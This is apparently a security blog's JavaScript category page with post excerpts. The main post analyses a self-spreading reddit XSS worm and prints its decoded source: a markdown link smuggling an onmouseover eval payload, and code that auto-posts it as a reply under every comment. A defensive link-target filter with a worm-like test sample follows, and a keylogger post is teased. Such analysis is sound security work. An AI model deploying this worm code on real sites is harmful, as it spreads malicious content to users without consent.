Javascript [insanesecurity]

That’s a cool trick

Today, while reddit was down for maintenance, people kept gathering on the #redditdowntime channel on freenode, where within a couple of minutes intriguing things started to happen.

You can read the whole story here (and come back afterwards).
(continue)


Reddit worm, oh boy…

As I am writing this, a JavaScript worm is having fun spreading on reddit. On the one hand we should be happy it only spreads and does not do anything else (you know, like cookie theft). On the other hand, it may be an attempt to DDoS reddit, because I'm suddenly starting to get error pages:

An error occurred while processing your request.
Reference #97.27c37259.1254106488.35b1d0e

The (decoded) code of the worm is the following:

// generate payload/attack vector
// having trouble understanding why this works
//
// z is a reddit markdown reference-style link ([x][b] plus a "[b]: target"
// definition) whose target smuggles an onmouseover handler. The handler
// eval()s this.innerHTML, i.e. the hovered element's own text, which is the
// worm itself, so hovering a poisoned comment re-runs the whole script.

z="[x][b]\n[b]:/["+this.innerHTML+"](/onmouseover=eval(unescape(this.innerHTML9371d7a2e3ae86a00aab4771e39d255d9371d7a2e3ae86a00aab4771e39d255d//)";

// and what's with the 9371d7a2e3ae86a00aab4771e39d255d9371d7a2e3ae86a00aab4771e39d255d ?

// "click" all reply links in the page, opening a reply form under every comment
// ($(...).click() relies on the page's own jQuery-style $ helper)
o=document;
e=o.getElementsByTagName('a');
for(i=0;i<e.length;i++)
    if(e[i].innerHTML=='reply')
        $(e[i]).click();

// fill every reply textarea with the payload
o=document;
e=o.getElementsByTagName('textarea');
for(i=0;i<e.length;i++)
    e[i].value=z;

// submit: click every visible "save" button, posting one poisoned reply per comment
e=o.getElementsByTagName('button');
for(i=0;i<e.length;i++)
    if(e[i].innerHTML=='save'&&e[i].style.display!='none')
        $(e[i]).click();

While writing this article I tried to look for the broken filtering in the source code, but as this was my first time touching that code, I had no sense of direction. If someone would be kind enough to point me to the file in which the code resides I'd be more than happy.

If not, we’ll have an unsolved mystery :)

UPDATE: the worm's author has happily shared their way of evading the filter.

UPDATE 2: post about the bug on the reddit blog.
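Whatever trick the markdown stage fell for, the check a renderer needs is an allow-list on link targets, since each target ends up inside an href attribute. The following is an added example, not reddit's filter and not the worm author's code. It assumes the renderer turns inline [text](target) links and "[id]: target" reference definitions into <a href="target">; the role of the hex string in the worm's payload is unknown, so the constructed sample payload leaves it out.

```javascript
// Added example (not from the original post): allow-list check for link targets
// in user-submitted markdown. Assumption: [text](target) and "[id]: target"
// both become <a href="target">, so a target must never carry parentheses,
// quotes, angle brackets, whitespace or a non-http scheme.

// Absolute http(s) URL, or a site-relative path that is not protocol-relative (//host).
var SAFE_TARGET = /^(?:https?:\/\/[^\s"'<>()]+|\/(?!\/)[^\s"'<>()]*)$/;

function isSafeLinkTarget(target) {
  return SAFE_TARGET.test(target);
}

// Pull every link target out of a comment: inline [text](target) links and
// reference definitions of the form "[id]: target" at the start of a line.
function extractLinkTargets(markdown) {
  var targets = [];
  var inline = /\[[^\]]*\]\(([^)]*)\)/g;
  var reference = /^\s*\[[^\]]+\]:\s*(\S+)/gm;
  var m;
  while ((m = inline.exec(markdown)) !== null) targets.push(m[1]);
  while ((m = reference.exec(markdown)) !== null) targets.push(m[1]);
  return targets;
}

// A comment is accepted only if every link target passes the allow-list.
function commentIsSafe(markdown) {
  var targets = extractLinkTargets(markdown);
  for (var i = 0; i < targets.length; i++) {
    if (!isSafeLinkTarget(targets[i])) return false;
  }
  return true;
}

// Constructed samples. The first mirrors the shape of the worm's payload z
// (hex suffix omitted, its role being unknown); the second is ordinary markdown.
var WORM_LIKE = "[x][b]\n[b]:/[x](/onmouseover=eval(unescape(this.innerHTML))//)";
var BENIGN = "see [the docs](https://example.com/docs) and [ref][1]\n[1]: /r/netsec";

console.log("worm-like comment accepted:", commentIsSafe(WORM_LIKE)); // false
console.log("benign comment accepted:", commentIsSafe(BENIGN));       // true
```

The inline pattern stops at the first closing parenthesis, so a legitimate URL containing parentheses is rejected as well; that is a deliberate conservative choice here, since a target that can contain ")" is exactly what lets a payload escape the link syntax.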


Benchmarking Javascript

There are a number of ways to benchmark JavaScript code. One is the Firebug console API, for example:

console.time("first");
// some javascript code
console.timeEnd("first");

Another is the one ppk suggested on his blog:

function testIt() {
    var startTime = new Date().getTime();

    // actual DOM functionality to be tested goes here

    // read the end time from a timeout, after this function has returned
    setTimeout(function () {
        var endTime = new Date().getTime();
        var result = (endTime-startTime)/1000;
        // print result
    }, 10);
}

The reason the result is read from a separate function run on a timeout is:

(…) some browsers only applies the result of the test (i.e. the changes in the DOM you want to test) to the screen after the function has ended entirely. (…) The correct way of conducting this test is setting a timeout for reading out the end time. The function ends when the in-memory DOM manipulation has been done, which allows the browser to apply the changes.

For code that does not touch the DOM, we could also use the following, more flexible helper. Note that it measures only synchronous script execution: the function is timed before the browser gets a chance to apply any DOM changes, so it does not benefit from the timeout trick above.

function benchmark(func) {
    var startTime = new Date().getTime();
    func();
    var endTime = new Date().getTime();
    return (endTime-startTime)/1000; // seconds
}

// as for usage
var time = benchmark(function() {
    // javascript code to benchmark
});
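A single Date.getTime() reading has millisecond resolution and is noisy, so in practice you want several runs and a summary. The block below is an added example, not code from the original post or from ppk: it repeats the synchronous measurement and reports min/mean/max, and wraps the timeout pattern quoted above into a callback-style variant for DOM work. The sample workload is constructed for illustration.

```javascript
// Added example (not from the original post): repeated benchmark with summary
// statistics, plus a DOM-aware variant that stops the clock from a timeout.

function timeOnce(func) {
  var start = new Date().getTime();
  func();
  return (new Date().getTime() - start) / 1000; // seconds
}

// Synchronous: fine for pure computation that never touches the DOM.
function benchmarkSync(func, runs) {
  var samples = [];
  for (var i = 0; i < runs; i++) samples.push(timeOnce(func));
  var total = samples.reduce(function (a, b) { return a + b; }, 0);
  return {
    runs: runs,
    min: Math.min.apply(null, samples),
    max: Math.max.apply(null, samples),
    mean: total / runs,
    samples: samples
  };
}

// DOM-aware: the end time is read from a timeout so the browser can apply the
// pending DOM changes before the clock is stopped; the result goes to a callback.
function benchmarkDeferred(func, done) {
  var start = new Date().getTime();
  func();
  setTimeout(function () {
    done((new Date().getTime() - start) / 1000);
  }, 10);
}

// Constructed workload: build and sort a throwaway array.
function sampleWorkload() {
  var a = [];
  for (var i = 0; i < 20000; i++) a.push((i * 7919) % 1000);
  a.sort(function (x, y) { return x - y; });
  return a;
}

var stats = benchmarkSync(sampleWorkload, 5);
console.log("min " + stats.min + "s, mean " + stats.mean.toFixed(4) + "s over " + stats.runs + " runs");
```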

It is completely unrelated to any aspect of security, but there are some topics that just make me blog about them… Anyway, I'll post again very soon; I have a few projects I've been working on lately.


Javascript/Userscript Keylogger

Some days ago, while I was writing the (traffic magnet) article HYGHAAZG and mentioned the keylogger, a userscript one instantly came to mind. I googled a bit but didn't seem to find any (quite amazed)…

(continue)


Bookmarklets

A bookmarklet is an applet, a small computer application, stored as the URL of a bookmark in a web browser or as a hyperlink on a web page. The term is a portmanteau of the terms bookmark and applet. Whether bookmarklet utilities are stored as bookmarks or hyperlinks, they are designed to add one-click functionality to a browser or web page. When clicked, a bookmarklet performs some function, one of a wide variety such as a search query or data extraction. Usually the applet is a JavaScript program. (Wikipedia)

(continue)


OWASP Code Review Guide

Code review is probably the single-most effective technique for identifying security flaws. When used together with automated tools and manual penetration testing, code review can significantly increase the cost effectiveness of an application security verification effort. (Introduction)
(continue)


userAtuh – frontend to backend encryption

How many times have you checked a web application of yours with a security auditing tool?
I can tell you that I have done it a couple of times, and as usual it always hit me with the same warning: 'the login information is sent in plain text to …php', or something of the sort.

(continue)


Spam free forms and contact details

I have always been annoyed by things like the morning alarm clock, long-distance travel, undocumented functions and spam. But of all the above, spam may well be the most annoying, as the rest don't happen that often.
(continue)




